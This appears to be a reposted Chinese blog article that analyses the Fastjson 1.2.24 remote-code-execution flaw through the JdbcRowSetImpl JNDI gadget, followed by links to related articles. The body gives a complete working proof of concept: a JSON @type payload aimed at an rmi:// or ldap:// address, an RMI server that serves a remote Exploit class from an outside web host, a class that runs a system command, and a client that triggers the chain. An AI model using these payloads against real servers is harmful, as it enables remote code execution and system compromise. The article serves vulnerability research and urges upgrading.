sqlrowset 转化为json_基于JdbcRowSetImpl的Fastjson RCE PoC构造与分析

最新推荐文章于 2022-09-13 23:52:40 发布
最新推荐文章于 2022-09-13 23:52:40 发布
阅读量115 收藏
点赞数
文章标签: sqlrowset 转化为json
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39641697/article/details/111922708
版权

阅读:

3,907

这篇文章主要是基于我在看雪2017开发者峰会的演讲而来,由于时间和听众对象的关系,在大会上主要精力都集中在反序列化的防御上。前面的Fastjson PoC的构造分析涉及得很少,另外我在5月份分享的Fastjson Poc构造与分析限制条件太多,所以写下这篇文章。

Fastjson 使用

Fastjson是Alibaba开发的,Java语言编写的高性能JSON库。采用“假定有序快速匹配”的算法,号称Java语言中最快的JSON库。Fastjson接口简单易用,广泛使用在缓存序列化、协议交互、Web输出、Android客户端

提供两个主要接口toJsonString和parseObject来分别实现序列化和反序列化。项目地址:https://github.com/alibaba/fastjson。那我们看下如何使用?首先定义一个User.java,代码如下:public class User {

private Long id;

private String name;

public Long getId() {

return id;

}

public void setId(Long id) {

this.id = id;

}

public String getName() {

return name;

}

public void setName(String name) {

this.name = name;

}

}

序列化的代码如下:import com.alibaba.fastjson.JSON;

User guestUser = new User();

guestUser.setId(2L);

guestUser.setName("guest");

String jsonString = JSON.toJSONString(guestUser);

System.out.println(jsonString);

反序列化的代码示例:String jsonString = "{\"name\":\"guest\",\"id\":12}";

User user = JSON.parseObject(jsonString, User.class);

上述代码的parseObject也可以直接用parse接口。

Fastjson安全特性

反序列化的Gadget需要无参默认构造方法或者注解指定构造方法并添加相应参数。使用Feature.SupportNonPublicField才能打开非公有属性的反序列化处理,@type可以指定反序列化任意类,调用其set,get,is方法。

上图则是Fastjson反序列框架图。JSON门面类,提供一些静态方法,如parse,parseObject.其主要功能都是在DefaultJSONParser类中实现。DefaultJSONParser引用了ParserConfig,主要保存一些相关配置信息。也引用了JSONLexerBase,这个类用来处理字符分析。而反序列化用到的JavaBeanDeserializer则是JavaBean反序列化处理主类。fastjson在1.2.24版本添加enable_autotype开关,将一些类加到黑名单中,后续我也给它报过bypass,fastjson也一并修复。

JNDI

JNDI即Java Naming and Directory Interface,翻译成中文就Java命令和目录接口,2016年的blackhat大会上web议题重点讲到,但是对于json这一块没有涉及。JNDI提供了很多实现方式,主要有RMI,LDAP,CORBA等。我们可以看一下它的架构图

!(2)[/images/JdbcRowSetImpl_2.png],JNDI提供了一个统一的外部接口,底层SPI则是多样的。在使用JNDIReferences的时候可以远程加载外部的对象,即实现factory的初始化。如果说其lookup方法的参数是我们可以控制的,可以将其参数指向我们控制的RMI服务,切换到我们控制的RMI/LDAP服务等等。Registry registry = LocateRegistry.createRegistry(1099);

//http://xxlegend.com/Exploit.class

Reference reference = new javax.naming.Reference(“Exploit",“Exploit","http://xxlegend.com/");

ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(reference);

registry.bind(“Exploit", referenceWrapper);

这段代码主要讲到了在1099端口上创建一个RMI服务,RMI的内容则是通过外部的http服务地址获取。在客户端则是将lookup的地址指向刚才我们创建的RMI服务,即能达到远程代码执行的目的。可以使用如下的请求端代码进行测试:Hashtable env = new Hashtable();

env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.rmi.registry.RegistryContextFactory");

env.put(Context.PROVIDER_URL, "rmi://localhost:1099");

Context ctx = new InitialContext(env);

Object local_obj = RicterCctx.lookup("rmi://xxlegend.com/Exploit");

那么攻击者的流程就是这样的。攻击者准备rmi服务和web服务,将rmi绝对路径注入到lookup方法中,受害者JNDI接口会指向攻击者控制rmi服务器,JNDI接口向攻击者控制web服务器远程加载恶意代码,执行构造函数形成RCE。

PoC构造与分析

介绍的背景有点多,正式切入我们的正题,基于JdbcRowSetImpl的PoC是如何构造和执行的。在今年5月份的时候,我也公布了Fastjson基于TemplateImpl的PoC的,但是限制还比较多,需要打开SupportNonPublic开关,这个场景是比较少见的,详细的分析见我的博客http://xxlegend.com/2017/04/29/title-%20fastjson%20%E8%BF%9C%E7%A8%8B%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96poc%E7%9A%84%E6%9E%84%E9%80%A0%E5%92%8C%E5%88%86%E6%9E%90/,后续ricterz也作了一篇分析:https://ricterz.me/posts/Fastjson%20Unserialize%20Vulnerability%20Write%20Up。

在看雪峰会上我提到了好几种PoC,下面我简单的给这些PoC做个分类:

1,基于TemplateImpl

2,基于JNDI Bean Property类型

3,基于JNDI Field类型

今天主讲基于JNDI Bean Property这个类型,这个类型和JNDI Field类型的区别就在于Bean Property需要借助setter,getter方法触发,而Field类型则没有这个必要。JdbcRowSetImpl刚好就在Bean Property分类之下,其他的PoC后续再讲。这个Poc相对于TemplateImpl却没有一点儿限制,当然java在JDK 6u132, 7u122, or 8u113补了是另外一码事。 PoC具体如下:{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://localhost:389/obj","autoCommit":true}

由于这个PoC是基于JNDI,下面我们简单构造一下,首先是服务端的代码:public class JNDIServer {

public static void start() throws

AlreadyBoundException, RemoteException, NamingException {

Registry registry = LocateRegistry.createRegistry(1099);

//http://xxlegend.com/Exploit.class即可

Reference reference = new Reference("Exloit",

"Exploit","http://xxlegend.com/");

ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);

registry.bind("Exploit",referenceWrapper);

}

public static void main(String[] args) throws RemoteException, NamingException, AlreadyBoundException {

start();

}

}

rmi服务端需要一个Exploit.class放到rmi指向的web服务器目录下,这个Exploit.class是一个factory,通过Exploit.java编译得来,在JNDI执行的过程会被初始化。如下是Exploit.java的代码:public class Exploit {

public Exploit(){

try{

Runtime.getRuntime().exec("calc");

}catch(Exception e){

e.printStackTrace();

}

}

public static void main(String[] argv){

Exploit e = new Exploit();

}

}

服务端构造好之后,下面来看java应用执行的代码,示例如下:public class JdbcRowSetImplPoc {

public static void main(String[] argv){

testJdbcRowSetImpl();

}

public static void testJdbcRowSetImpl(){

// String payload = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://localhost:1389/Exploit\"," +

// " \"autoCommit\":true}";

String payload = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://localhost:1099/Exploit\"," +

" \"autoCommit\":true}";

JSON.parse(payload);

}

}

完整的代码已经放到PoC调用栈如下

![3](/images/JdbcRowSetImpl_3.png)

从这个调用栈就可以看出,在进入Gadget之前,首先是Java应用调用Fastjson的parseObject或者parse接口,进入JavaObjectDeserializer.deserialize方法,经过一系列判断之后发现是JavaBean,就会调用JavaBeanDeserializer.deserialize接口,反序列化得到Gadget相关域,在这个过程中都是通过反射调用这些域的getter,setter或者is方法,这就正式在Gadget执行代码。下面看一下在Gadget中执行的代码。在反序列化过程中是有次序来调用相应接口的,首先是设置dataSourceName属性,这个是其父类BaseRowSet继承过来的。

```java

public void setDataSourceName(String name) throws SQLException {

if (name == null) {

dataSource = null;

} else if (name.equals("")) {

throw new SQLException("DataSource name cannot be empty string");

} else {

dataSource = name;

}

URL = null;

}

设置autoCommit属性:public void setAutoCommit(boolean var1) throws SQLException {

if(this.conn != null) {

this.conn.setAutoCommit(var1);

} else {

this.conn = this.connect();

this.conn.setAutoCommit(var1);

}

}

这setAutoCommit里函数里会触发connect函数。private Connection connect() throws SQLException {

if(this.conn != null) {

return this.conn;

} else if(this.getDataSourceName() != null) {

try {

InitialContext var1 = new InitialContext();

DataSource var2 = (DataSource)var1.lookup(this.getDataSourceName());

return this.getUsername() != null && !this.getUsername().equals("")?var2.getConnection(this.getUsername(), this.getPassword()):var2.getConnection();

} catch (NamingException var3) {

throw new SQLException(this.resBundle.handleGetObject("jdbcrowsetimpl.connect").toString());

}

} else {

return this.getUrl() != null?DriverManager.getConnection(this.getUrl(), this.getUsername(), this.getPassword()):null;

}

}

这里面就调用InitialContext的lookup方法,而且找到的就是我们前面设置的DataSourceName(),达到远程调用任意类的目的。由于JdbcRowSetImpl是官方自带的库,所以这个PoC的威力相对来说更厉害。如果还在使用Fastjson 1.2.24版本及以下烦请升级。

weixin_39641697
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
jdbcTemplate使用方法实例解析
08-25
jdbcTemplate是一个基于Spring JDBC抽象框架的核心类,提供了大量实用的方法来简化数据库操作。在本文中,我们将详细介绍jdbcTemplate的使用方法实例解析,以及其在实际开发中的应用价值。 一、JdbcTemplate概述 ...
【JAVA反序列化学习5】fastjson反序列化JdbcRowSetImpl类JNDI注入分析
GX233的博客
06-01 899
fastjson反序列化JdbcRowSetImpl类JNDI注入
Fastjson 1.2.24远程代码执行漏洞(com.sun.rowset.JdbcRowSetImpl
further_eye的博客
11-16 3999
漏洞是利用fastjson autotype在处理json对象的时候,未对@type字段进行完全的安全性验证,攻击者可以传入危险类,并调用危险类连接远程rmi主机,通过其中的恶意类执行代码。攻击者通过这种方式可以实现远程代码执行漏洞的利用,获取服务器的敏感信息泄露,甚至可以利用此漏洞进一步对服务器数据进行修改,增加,删除等操作,对服务器造成巨大的影响。
Java反序列化6-Fastjson JdbcRowSetImpl 链及后续漏洞分析
weixin_43263451的博客
07-18 1299
上一节讲了TemplatesImpl链的利用方式,但是呢其局限性较大需要后端开启Feature.SupportNonPublicField且因为Feature.SupportNonPublicField是在fastjson1.2.22版本才引入所以只影响1.2.22-1.2.24版本fastjson这里的JdbcRowSetImpl链比TemplatesImpl链利用范围更大一点后面版本的fastjson漏洞都是在绕过黑名单,所以在本文中一次全部陈述总结前言.前言.前言。............
Fastjson 的 3 种漏洞利用链,一起来看看
Java技术栈,分享最主流的Java技术
11-05 1610
作者:4ra1n 来源:https://www.anquanke.com/post/id/248892 Fastjson已被大家分析过很多次,本文主要是对三种利用链做分析和对比 JdbcRowSetImpl String payload = "{\n" + " \"a\":{\n" + " \"@type\":\"java.lang.Class\",\n&quot
C#笔记14 方法01
Tervor_HAN的博客
09-17 545
C#笔记14 方法01 ——本系列是基于人民邮电出版社《C#2008 C#图解教程》、清华大学出版社《C#入门经典(第五版)》两本书的自学C#笔记,如果您发现了本文的纰漏,还望不吝指正。 写在前边 在 C#笔记10 类:基础 中,我们已经知道,方法是类中重要的一个函数成员 除了类中,方法也可以声明在结构体,接口中 *复习:方法是具有名称的可执行代码块,当方法被调用时,它执行自己所含的代码,然后返回到调用它的代码。有些方法返回一个值到它们被调用的位置。 1. 方法的结构 在类的相关笔记中,我们已经知道了如何声
ROWSET介绍加实例
11-24
这使得ROWSET在处理大量数据时更为高效,因为减少了与数据库的来回通信。 ROWSET基于JavaBeans规范,可以被看作是可序列化的ResultSet。这意味着ROWSET中的数据可以保存到磁盘或者通过网络传输,然后在需要的时候再...
JdbcTemplate操作总结
11-03
`UserRowMapper`是自定义的结果集映射器,用于将数据库记录转化为User对象。 JdbcTemplate还提供了事务管理的能力,通过`TransactionDefinition`和`PlatformTransactionManager`可以进行编程式或声明式事务控制。这...
JdbcTemplate查询
12-09
SqlRowSet rs = jdbcTemplate.queryForRowSet("SELECT * FROM user WHERE id=?", params); while (rs.next()) { System.out.println(rs.getString("name")); } ``` 以上代码展示了如何使用`queryForRowSet()`方法...
sun.jdbc.rowset
10-16
网上找了很多 下载下来都是com.sun.rowset 这个是正确的sun.jdbc.rowset
Java6RowSet使用完全剖析
03-02
本文内容包括:RowSet简介类继承结构实验环境使用CachedRowSet使用WebRowSet使用FilteredRowSet使用JdbcRowSet使用JoinRowSet结束语下载参考资料C#提供了DataSet,可以将数据源中的数据读取到内存中,进行离线操作,然后再同步到数据源。同样,在Java中也提供了类似的实现,即RowSet。javax.sql.rowset包下,定义了五个不同的RowSet接口,供不同的场合使用。本文将分别对这五个RowSet的使用场合以及详尽用法进行介绍,并且描述使用中可能出现的问题,以提醒读者在实际使用时绕开这些问题。RowSet简介javax.sql.r
sun.jdbc.rowset的jar包
06-17
sun.jdbc.rowset的jar包,2000年的老包。不过有些老项目需要。 包括sun.jdbc.rowset.CachedRowSet
com.sun.rowset.jar.zip
06-14
sun公司的rowset jar包。操作数据库很酷的
java 反显_java反序列化的恶意类回显实验
weixin_33102135的博客
03-07 474
//希望自己能持续的坚持学java因为看书学java有点枯燥,虽然我没搞清楚状况,但是还是希望做个实验。以下是实验记录。前提条件准备一个 漏洞环境,比如vulhub里的fastjson开始实验vulhub 里的readme里的payload类似以下{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{...
Fastjson反序列化漏洞(1.2.24 RCE)
m0_61506558的博客
09-13 3064
Fastjson是一个JSON工具库,它的作用就是把java对象转换为json形式,也可以用来将json转换为java对象。@type引入这个功能的目的是在序列化的时候防止子类中包含接口或抽象类的时候,类型丢失,这样我们在反序列化的时候就不需要再指定类名。
JAVA详细思路|Java安全之FastJson JdbcRowSetImpl分析
m0_57227221的博客
05-17 1062
Java安全之FastJson JdbcRowSetImpl分析 0x00 前言 这一次我们来学习 JdbcRowSetImpl 利用链, JdbcRowSetImpl 的利用链在实际运用中较为广泛,这个链基本没啥限制条件,只需要 Json.parse(input) 即可进行命令执行。 0x01 漏洞分析 利用限制 首先来说说限制,基于JNDI+RMI或JDNI+LADP进行攻击,会有一定的JDK版本限制。 RMI利用的JDK版本≤ JDK 6u132、7u122、8u113 LADP利用JDK版本≤
fastjson反序列化攻防
公众号shadow sock7
03-25 6235
<=1.2.24 JNDI注入利用链(com.sun.rowset.JdbcRowSetImpl) 按照这张图里的描述: 使用JdbcRowSetImpl类作为目标类,根据PoC中指定的属性dataSourceName和autoCommit,到时候应该会调用setDataSourceName。 PoC内容如下: package com.cqq; import com.alibaba.fa...
FastJson<=1.2.24 JdbcRowSetImpl利用链分析
weixin_45682070的博客
12-29 3343
前言 上文分析了TemplatesImpl利用链,对fastjson parseObject函数进行了分析,明白了整个触发漏洞的流程,接着来学习JdbcRowSetImpl 利用链,JdbcRowSetImpl的利用链在实际运用中较为广泛,这个链基本没啥限制条件,只需要Json.parse(input)即可进行命令执行。这条链主要利用了setAutoCommit方法调用InitialContext.lookup并且参数是未经过滤dataSourceName,导致JNDI注入,造成命令执行。其中涉及了JDNI
org.springframework.jdbc.support.rowset.SqlRowSet关闭
最新发布
05-14
在使用 Spring JDBC 操作数据库时,SqlRowSet 是 Spring JDBC 提供的一种方便的处理查询结果集的方式。SqlRowSet 接口实现了 ResultSet 接口,但 SqlRowSet 对象不需要显式地关闭,因为 Spring JDBC 会自动关闭它。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值